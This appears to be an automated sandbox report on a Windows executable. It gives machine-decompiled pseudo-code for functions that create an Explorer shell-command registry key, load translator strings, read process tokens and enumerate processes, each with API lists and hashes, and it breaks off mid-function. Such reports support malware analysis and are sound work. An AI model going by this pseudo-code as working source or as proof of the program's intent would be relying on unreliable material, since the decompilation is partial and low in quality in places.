                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                    • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                    • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                    • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                    • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                    0x00404415
                                                                                                                    0x0040441d
                                                                                                                    0x0040442c
                                                                                                                    0x00404435
                                                                                                                    0x004045b3
                                                                                                                    0x004045b7
                                                                                                                    0x004045b7
                                                                                                                    0x0040444b
                                                                                                                    0x00404452
                                                                                                                    0x00404457
                                                                                                                    0x00404460
                                                                                                                    0x00404461
                                                                                                                    0x00404462
                                                                                                                    0x0040446d
                                                                                                                    0x00404472
                                                                                                                    0x00404473
                                                                                                                    0x00404490
                                                                                                                    0x004044a5
                                                                                                                    0x004044b4
                                                                                                                    0x004044b6
                                                                                                                    0x004044b7
                                                                                                                    0x004044bd
                                                                                                                    0x004044cf
                                                                                                                    0x004044db
                                                                                                                    0x004044eb
                                                                                                                    0x004044f1
                                                                                                                    0x004044f6
                                                                                                                    0x004044f9
                                                                                                                    0x004044fe
                                                                                                                    0x00404506
                                                                                                                    0x00404507
                                                                                                                    0x00404508
                                                                                                                    0x00404510
                                                                                                                    0x00404521
                                                                                                                    0x00404532
                                                                                                                    0x00404539
                                                                                                                    0x00404547
                                                                                                                    0x0040454e
                                                                                                                    0x0040455b
                                                                                                                    0x0040455c
                                                                                                                    0x00404564
                                                                                                                    0x0040456f
                                                                                                                    0x00404570
                                                                                                                    0x00404571
                                                                                                                    0x0040457c
                                                                                                                    0x0040457d
                                                                                                                    0x00404588
                                                                                                                    0x00404589
                                                                                                                    0x0040458a
                                                                                                                    0x004045a0
                                                                                                                    0x004045a5
                                                                                                                    0x00404521
                                                                                                                    0x004044eb
                                                                                                                    0x004045ab
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00404452
                                                                                                                    • _snwprintf.MSVCRT ref: 00404473
                                                                                                                      • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                      • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                      • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                    • memset.MSVCRT ref: 004044CF
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                    • memset.MSVCRT ref: 00404539
                                                                                                                    • memset.MSVCRT ref: 0040454E
                                                                                                                    • _snwprintf.MSVCRT ref: 00404571
                                                                                                                    • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                      • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                    • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                    • API String ID: 486436031-734527199
                                                                                                                    • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                    • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                    • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                    • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                    0x00406466
                                                                                                                    0x0040647d
                                                                                                                    0x00406484
                                                                                                                    0x00406499
                                                                                                                    0x004064a0
                                                                                                                    0x004064af
                                                                                                                    0x004064b4
                                                                                                                    0x004064bb
                                                                                                                    0x004064cd
                                                                                                                    0x004064d2
                                                                                                                    0x004064d4
                                                                                                                    0x004064e4
                                                                                                                    0x004064ea
                                                                                                                    0x004064ea
                                                                                                                    0x004064f3
                                                                                                                    0x00406503
                                                                                                                    0x00406514
                                                                                                                    0x00406525
                                                                                                                    0x0040653b
                                                                                                                    0x0040654e
                                                                                                                    0x00406568
                                                                                                                    0x00406572
                                                                                                                    0x0040657a
                                                                                                                    0x00406582
                                                                                                                    0x0040658a
                                                                                                                    0x00406596

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00406484
                                                                                                                    • memset.MSVCRT ref: 004064A0
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                      • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                      • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                      • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                      • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                      • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                      • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                      • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                    • wcscpy.MSVCRT ref: 004064E4
                                                                                                                    • wcscpy.MSVCRT ref: 004064F3
                                                                                                                    • wcscpy.MSVCRT ref: 00406503
                                                                                                                    • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                    • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                    • wcscpy.MSVCRT ref: 0040657A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                    • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                    • API String ID: 3037099051-2314623505
                                                                                                                    • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                    • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                    • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                    • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                    0x00409ab0
                                                                                                                    0x00409ab7
                                                                                                                    0x00409ac8
                                                                                                                    0x00409acf
                                                                                                                    0x00409ad4
                                                                                                                    0x00409ae0
                                                                                                                    0x00409ae6
                                                                                                                    0x00409ae8
                                                                                                                    0x00409af0
                                                                                                                    0x00409c3a
                                                                                                                    0x00409c41
                                                                                                                    0x00409c67
                                                                                                                    0x00000000
                                                                                                                    0x00409c67
                                                                                                                    0x00409c49
                                                                                                                    0x00409c50
                                                                                                                    0x00409c51
                                                                                                                    0x00409c56
                                                                                                                    0x00409c57
                                                                                                                    0x00409c5a
                                                                                                                    0x00000000
                                                                                                                    0x00409c64
                                                                                                                    0x00409b00
                                                                                                                    0x00409b03
                                                                                                                    0x00409b06
                                                                                                                    0x00409b0b
                                                                                                                    0x00409b10
                                                                                                                    0x00409ba9
                                                                                                                    0x00409bac
                                                                                                                    0x00409bc1
                                                                                                                    0x00409bc7
                                                                                                                    0x00409bcc
                                                                                                                    0x00409bd8
                                                                                                                    0x00409bf0
                                                                                                                    0x00409bf2
                                                                                                                    0x00409c23
                                                                                                                    0x00409c26
                                                                                                                    0x00409c2f
                                                                                                                    0x00409c34
                                                                                                                    0x00409c34
                                                                                                                    0x00000000
                                                                                                                    0x00409c2f
                                                                                                                    0x00409bf7
                                                                                                                    0x00409bfb
                                                                                                                    0x00409c02
                                                                                                                    0x00409c06
                                                                                                                    0x00409c0d
                                                                                                                    0x00409c14
                                                                                                                    0x00409c17
                                                                                                                    0x00409c18
                                                                                                                    0x00409c1b
                                                                                                                    0x00409c1e
                                                                                                                    0x00000000
                                                                                                                    0x00409c1e
                                                                                                                    0x00409b1f
                                                                                                                    0x00409b25
                                                                                                                    0x00409b2a
                                                                                                                    0x00409b2d
                                                                                                                    0x00409b33
                                                                                                                    0x00409b3d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409b4b
                                                                                                                    0x00409b53
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409b6a
                                                                                                                    0x00409b6c
                                                                                                                    0x00409b6e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409b77
                                                                                                                    0x00409b7b
                                                                                                                    0x00409b82
                                                                                                                    0x00409b86
                                                                                                                    0x00409b8d
                                                                                                                    0x00409b8e
                                                                                                                    0x00409b94
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00409AB7
                                                                                                                    • memset.MSVCRT ref: 00409ACF
                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                    • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                      • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                    • memset.MSVCRT ref: 00409B25
                                                                                                                    • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                    • memset.MSVCRT ref: 00409BC7
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                    • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                    • API String ID: 3504373036-27875219
                                                                                                                    • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                    • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                    • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                    • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                    0x00409179
                                                                                                                    0x00409209
                                                                                                                    0x00409209
                                                                                                                    0x00409185
                                                                                                                    0x0040918a
                                                                                                                    0x0040918f
                                                                                                                    0x00409208
                                                                                                                    0x00000000
                                                                                                                    0x00409191
                                                                                                                    0x0040919e
                                                                                                                    0x004091a2
                                                                                                                    0x004091a7
                                                                                                                    0x004091af
                                                                                                                    0x004091b3
                                                                                                                    0x004091b8
                                                                                                                    0x004091c0
                                                                                                                    0x004091c4
                                                                                                                    0x004091c9
                                                                                                                    0x004091d1
                                                                                                                    0x004091d5
                                                                                                                    0x004091da
                                                                                                                    0x004091e2
                                                                                                                    0x004091e6
                                                                                                                    0x004091eb
                                                                                                                    0x004091ed
                                                                                                                    0x004091ed
                                                                                                                    0x004091eb
                                                                                                                    0x004091da
                                                                                                                    0x004091c9
                                                                                                                    0x004091b8
                                                                                                                    0x004091ff
                                                                                                                    0x00409202
                                                                                                                    0x00409202
                                                                                                                    0x00000000
                                                                                                                    0x004091ff

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                    • API String ID: 1182944575-70141382
                                                                                                                    • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                    • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                    • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                    • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                    0x004090f5
                                                                                                                    0x00409171
                                                                                                                    0x00409171
                                                                                                                    0x004090fd
                                                                                                                    0x00409103
                                                                                                                    0x00409107
                                                                                                                    0x00409170
                                                                                                                    0x00000000
                                                                                                                    0x00409170
                                                                                                                    0x00409116
                                                                                                                    0x0040911a
                                                                                                                    0x0040911f
                                                                                                                    0x00409127
                                                                                                                    0x0040912b
                                                                                                                    0x00409130
                                                                                                                    0x00409138
                                                                                                                    0x0040913c
                                                                                                                    0x00409141
                                                                                                                    0x00409149
                                                                                                                    0x0040914d
                                                                                                                    0x00409152
                                                                                                                    0x0040915a
                                                                                                                    0x0040915e
                                                                                                                    0x00409163
                                                                                                                    0x00409165
                                                                                                                    0x00409165
                                                                                                                    0x00409163
                                                                                                                    0x00409152
                                                                                                                    0x00409141
                                                                                                                    0x00409130
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                    • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                    • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                    • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                    • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
